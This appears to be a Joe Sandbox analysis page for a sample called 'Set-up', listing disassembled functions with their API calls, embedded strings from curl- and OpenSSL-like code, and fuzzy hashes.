Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: fputc
String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 1992160199-2555271450
Opcode ID: 8736861a852d6a3ba8b2f93125fb0ca5562358091fbc6c523ae914423c178534
Instruction ID: ab2766e1937baca90d9c9981a142912388dadd11546845b9fdd86c20e4654251
Opcode Fuzzy Hash: 8736861a852d6a3ba8b2f93125fb0ca5562358091fbc6c523ae914423c178534
Instruction Fuzzy Hash: AF82B071A083019FD714EE29C88476BB7E1AFC5728F148A3DF9A997291D330DD46CB46

Function 00C94940 Relevance: 25.2, APIs: 1, Strings: 13, Instructions: 731COMMON

Download Yara Rule

APIs

Part of subcall function 00C9D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,00C901B1), ref: 00C9D8E2

fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00C952A5

Strings

%7lldd, xrefs: 00C94E50, 00C94F9A, 00C950C3
-:--, xrefs: 00C94F08
--:-, xrefs: 00C94DC6
%2lld:%02lld:%02lld, xrefs: 00C94DA4, 00C94EEA, 00C95047
Callback aborted, xrefs: 00C94A7C
%3lldd %02lldh, xrefs: 00C94E35, 00C94F7F, 00C950AB
--:-, xrefs: 00C94FD0
-:--, xrefs: 00C94DBE
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s, xrefs: 00C9528E
%% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 00C94AFC
--:-, xrefs: 00C94F10
** Resuming transfer from byte position %lld, xrefs: 00C94AE9
-:--, xrefs: 00C94FC8

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: CounterPerformanceQueryfflush
String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
API String ID: 1125614567-122532811
Opcode ID: 1d9fb2c9a3a774eee41226d614c6b0656a63e192a89c82c594e061e761b2d1b5
Instruction ID: 8cc1f7bd519d16c7591a9cba5121de5ff4bd482ea5b7deefde0385b8ae10b5bf
Opcode Fuzzy Hash: 1d9fb2c9a3a774eee41226d614c6b0656a63e192a89c82c594e061e761b2d1b5
Instruction Fuzzy Hash: 3A42F671B08701AFD708DE28CC85FABB6E6EBC4704F048A2CF59D97291D775AD058B92

Function 00F10170 Relevance: 23.2, APIs: 8, Strings: 7, Instructions: 704COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000040), ref: 00F10374
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000080), ref: 00F10395
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000008), ref: 00F1049D
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000004), ref: 00F104E7
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,?), ref: 00F1055F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000298,?,?), ref: 00F1057A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00F10618
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,0000005C,?), ref: 00F106E3

Strings

SHA2-224, xrefs: 00F10238
SHA1, xrefs: 00F101F7
SHA2-256, xrefs: 00F10B05
SHA2-384, xrefs: 00F10B62
@, xrefs: 00F10B42
MD5, xrefs: 00F10194
SHA2-512, xrefs: 00F10BA5

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: @$MD5$SHA1$SHA2-224$SHA2-256$SHA2-384$SHA2-512
API String ID: 1297977491-3776850024
Opcode ID: 914aa924886dfab40ba40e6a2bf941e825ee868680c63381e791e473f01e8b0a
Instruction ID: b361163959a9cf4e80e8d50572b9aee582b9775232a4dfcf679aca3d45cf7f14
Opcode Fuzzy Hash: 914aa924886dfab40ba40e6a2bf941e825ee868680c63381e791e473f01e8b0a
Instruction Fuzzy Hash: 0F5291719087818BD711CF29D845BEBB7E4BFD9354F048A2DF8C892242EB749984DB92

Function 00E5E270 Relevance: 22.7, APIs: 15, Instructions: 238filestringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(crypto/mem_sec.c,00000187,assertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0,crypto/mem_sec.c,00000185,assertion failed: list >= 0 && list < sh.freelist_size,crypto/mem_sec.c,00000184,-00000001), ref: 00E5E28D
FindNextFileW.KERNEL32(?,00000000), ref: 00E5E2BB
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,0000000100000001,?,00000100,00000000,00000000,?,?), ref: 00E5E30A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00E5E3C7
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E5E3DD
calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000354), ref: 00E5E3F8
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000000), ref: 00E5E41A
MultiByteToWideChar.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00E5E44E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 00E5E563
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 00E5E571

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide_errno$FileFindNextcallocfreestrlen
String ID:
API String ID: 1393009926-0
Opcode ID: 20694358cf2936a45aa9325efd55b5193be9513571b04b8f7a539b3f10e3160c
Instruction ID: 27c588939d6f29ce04fe0cf4653b88a41666371df6acaf76f148eb551784d86f
Opcode Fuzzy Hash: 20694358cf2936a45aa9325efd55b5193be9513571b04b8f7a539b3f10e3160c
Instruction Fuzzy Hash: 89912875600B029FD3258F38CC44B767BA9FF85316F188A69E8559B3E1E730EA54CB50

Function 00D3C900 Relevance: 18.4, APIs: 8, Strings: 4, Instructions: 368COMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00D3CC95

Part of subcall function 00D3CDF0: memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00D3CEC8
Part of subcall function 00D3CDF0: SetLastError.KERNEL32(00000002,00000000,00D3CC27,00000004), ref: 00D3D109

SetLastError.KERNEL32(00000002), ref: 00D3CDD0

Strings

:, xrefs: 00D3C9B5
0123456789abcdef, xrefs: 00D3CA03, 00D3CA14, 00D3CA9A, 00D3CAAB
0123456789ABCDEF, xrefs: 00D3CA29, 00D3CA3E, 00D3CAC3, 00D3CAD4
0123456789, xrefs: 00D3CC5E, 00D3CC8E

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ErrorLastmemchr
String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
API String ID: 2208448350-3285806060
Opcode ID: 7b3aab661765f4a0bbd721156e54e11f494fb3adbafa24777a4017c58e5cf6b6
Instruction ID: e25220adaa281a7168ea3c855f05dfcc66a958559b54f627e3c7c130eb5376d9
Opcode Fuzzy Hash: 7b3aab661765f4a0bbd721156e54e11f494fb3adbafa24777a4017c58e5cf6b6
Instruction Fuzzy Hash: 5FD14B72A183018BD724DF28D84137AB7D1AF91304F19AA3DF8D9A7281EB74DD44D762

Function 00DF49F0 Relevance: 16.7, Strings: 13, Instructions: 421COMMON

Download Yara Rule

Strings

%5ld:d=%-2d hl=%ld l=%4ld %s, xrefs: 00DF4B4D
length is greater than %ld, xrefs: 00DF53BA
priv [ %d ] , xrefs: 00DF4C3F
cont [ %d ], xrefs: 00DF4CC9
prim: , xrefs: 00DF4B37
%5ld:d=%-2d hl=%ld l=inf %s, xrefs: 00DF4B17
Error in encoding, xrefs: 00DF5392
<ASN1 %d>, xrefs: 00DF4C67
appl [ %d ], xrefs: 00DF4CD1
cons: , xrefs: 00DF4B09, 00DF4B32, 00DF4B3F
BAD RECURSION DEPTH, xrefs: 00DF4A13
(unknown), xrefs: 00DF4E8D
%-18s, xrefs: 00DF4D01

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID: %-18s$%5ld:d=%-2d hl=%ld l=%4ld %s$%5ld:d=%-2d hl=%ld l=inf %s$(unknown)$<ASN1 %d>$BAD RECURSION DEPTH$Error in encoding$appl [ %d ]$cons: $cont [ %d ]$length is greater than %ld$prim: $priv [ %d ]
API String ID: 0-2568808753
Opcode ID: f1e858c23308c274724ed2a0e183b4a47fd245a23d1b30bc4d5c2653ec09bc31
Instruction ID: 3aebfd4509bd11fdb537b42a78d0963780a67e12600c9d360b7573d099fe39bc
Opcode Fuzzy Hash: f1e858c23308c274724ed2a0e183b4a47fd245a23d1b30bc4d5c2653ec09bc31
Instruction Fuzzy Hash: C3E1C671508309AFD7209F58EC85B3FB7E5EF84744F06882CFB8957252E671E9409BA2

Function 00C8A960 Relevance: 15.0, APIs: 3, Strings: 6, Instructions: 1493COMMON

Download Yara Rule

Strings

0, xrefs: 00C8AEBE
(nil), xrefs: 00C8AF85
-, xrefs: 00C8AF2B
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 00C8ACAF, 00C8ADF1
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00C8A9C6, 00C8ACB4, 00C8ADF6
.%d, xrefs: 00C8B1D2

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 0-2555271450
Opcode ID: 1985f32dc4830d59b41cd977a2abd52551f7e2d2e6ee4da695cfd04944e72306
Instruction ID: aaf057b52d21c26f47def09b8bc855bae71f81fb18b77136038715c570aa0818
Opcode Fuzzy Hash: 1985f32dc4830d59b41cd977a2abd52551f7e2d2e6ee4da695cfd04944e72306
Instruction Fuzzy Hash: 00C29D316087418FD718DF29C49076AB7E2FFC9318F198A2DE8A99B351D730ED458B86

Function 00FF0460 Relevance: 12.0, APIs: 5, Strings: 2, Instructions: 1488COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00FF06A3

Strings

, xrefs: 00FF1813
, xrefs: 00FF16D8

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: $
API String ID: 3510742995-227171996
Opcode ID: f94c6c8a8c873a807aedce7aee3eabc19879f21e64807233c14e5bbeb7498954
Instruction ID: 1a5b3740dcca461b355f2c5320b8fcc37921ed3c99be5cadadcb4e494adb00bb
Opcode Fuzzy Hash: f94c6c8a8c873a807aedce7aee3eabc19879f21e64807233c14e5bbeb7498954
Instruction Fuzzy Hash: BFD2A3729087598FC724CF28C88066AF7E1FFC4714F198A2DE99997362D770E845DB82

Function 00EC87D0 Relevance: 11.1, APIs: 6, Strings: 1, Instructions: 565COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00EC8A66
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00EC8A88
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000010), ref: 00EC8B45
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00EC8B59

Strings

providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c, xrefs: 00EC8A42, 00EC8F13

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c
API String ID: 1297977491-3184136495
Opcode ID: e48eb5766788e8f7b103a1bb49eb51131a5937ab0977b8eebbd48f16e51de9a8
Instruction ID: ea506bef8f3f0a3ae713534ea24c9bafd9f2d279ea63ea24716eeac4d7e86bda
Opcode Fuzzy Hash: e48eb5766788e8f7b103a1bb49eb51131a5937ab0977b8eebbd48f16e51de9a8
Instruction Fuzzy Hash: 3A22F3725087419FD711CF24CA81BABB7E4FF96348F048A2DF895A7242DB31E945CB52

Function 01004780 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 446stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 010047A3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 010047C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 01004800
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 01004D16

Strings

xn--, xrefs: 010049D3
H, xrefs: 01004A88

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _strdupmemcpystrchrstrlen
String ID: H$xn--
API String ID: 1602650251-4022323365
Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
Instruction ID: b36e070e392d6b2d301e54b4e88ff4a701667722a1bce83fd45da024aa105090
Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
Instruction Fuzzy Hash: AAE13771A087158BE71ADE2CD8C072EB7D2ABC4210F198A7EDBD6C73C1D7749845874A

Function 00F8C050 Relevance: 10.8, APIs: 3, Strings: 4, Instructions: 304COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00F8C090
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000102), ref: 00F8C0BE

Strings

assertion failed: ctx->length <= (int)sizeof(ctx->enc_data), xrefs: 00F8C433
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./, xrefs: 00F8C0D2, 00F8C266
crypto/evp/encode.c, xrefs: 00F8C42E
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 00F8C0CD, 00F8C26B

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$assertion failed: ctx->length <= (int)sizeof(ctx->enc_data)$crypto/evp/encode.c
API String ID: 3510742995-2458911571
